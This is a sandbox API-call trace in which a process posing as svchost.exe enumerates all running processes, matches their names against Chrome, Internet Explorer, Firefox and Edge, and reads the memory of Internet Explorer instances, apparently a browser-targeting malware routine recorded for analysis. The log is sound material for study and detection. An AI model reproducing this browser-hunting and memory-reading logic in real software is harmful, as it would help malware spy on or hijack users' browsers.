	[0228.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.875] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0228.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.875] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0228.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x648c
	[0228.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.876] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0228.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.877] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.877] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0228.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.878] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0228.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6490
	[0228.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.879] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0228.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.879] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.880] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0228.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.881] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0228.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6494
	[0228.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.882] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0228.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.882] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.883] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0228.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.883] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0228.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6498
	[0228.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.886] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0228.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.887] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.887] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0228.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.888] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.889] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0228.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x649c
	[0228.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.890] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0228.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.891] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.891] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0228.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.892] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x64a0
	[0228.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.894] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.894] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.894] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0228.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.895] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.895] NtQueryInformationProcess (in: ProcessHandle=0x64a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.895] ReadProcessMemory (in: hProcess=0x64a0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.895] ReadProcessMemory (in: hProcess=0x64a0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.895] ReadProcessMemory (in: hProcess=0x64a0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.895] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x64a4
	[0228.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.896] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.897] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.897] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0228.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.897] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.897] NtQueryInformationProcess (in: ProcessHandle=0x64a4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.897] ReadProcessMemory (in: hProcess=0x64a4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.897] ReadProcessMemory (in: hProcess=0x64a4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.898] ReadProcessMemory (in: hProcess=0x64a4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.898] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.898] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.899] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x64a8
	[0228.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.899] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.899] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.900] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.900] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0228.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x64ac
	[0228.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.901] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0228.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.902] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.902] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0228.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.902] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x64b0
	[0228.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.904] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.904] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.905] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.905] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x64b4
	[0228.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.908] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.908] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.909] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.909] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x64b8
	[0228.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.911] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.911] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.912] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.912] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x64bc
	[0229.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.268] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.268] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.268] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0229.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.269] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0229.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x64c0
	[0229.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.270] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.270] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.271] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.271] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x64c4
	[0229.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.272] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.272] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.273] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.273] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.273] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0229.275] CloseHandle (hObject=0x4fd0) returned 1
	[0229.275] Sleep (dwMilliseconds=0x64) 
	[0229.386] GetCurrentProcessId () returned 0x110
	[0229.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0229.392] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0229.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0229.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0229.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x64c8
	[0229.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.395] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.395] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.396] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.396] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x64cc
	[0229.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.397] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.397] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.398] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.398] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0229.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x64d0
	[0229.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.400] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0229.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.400] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.400] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0229.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.401] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.401] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x64d4
	[0229.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.402] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.402] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.403] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.403] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0229.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x64d8
	[0229.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.404] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0229.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.404] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.405] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0229.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.406] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.406] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0229.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x64dc
	[0229.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.407] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0229.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.408] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.408] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0229.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.408] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
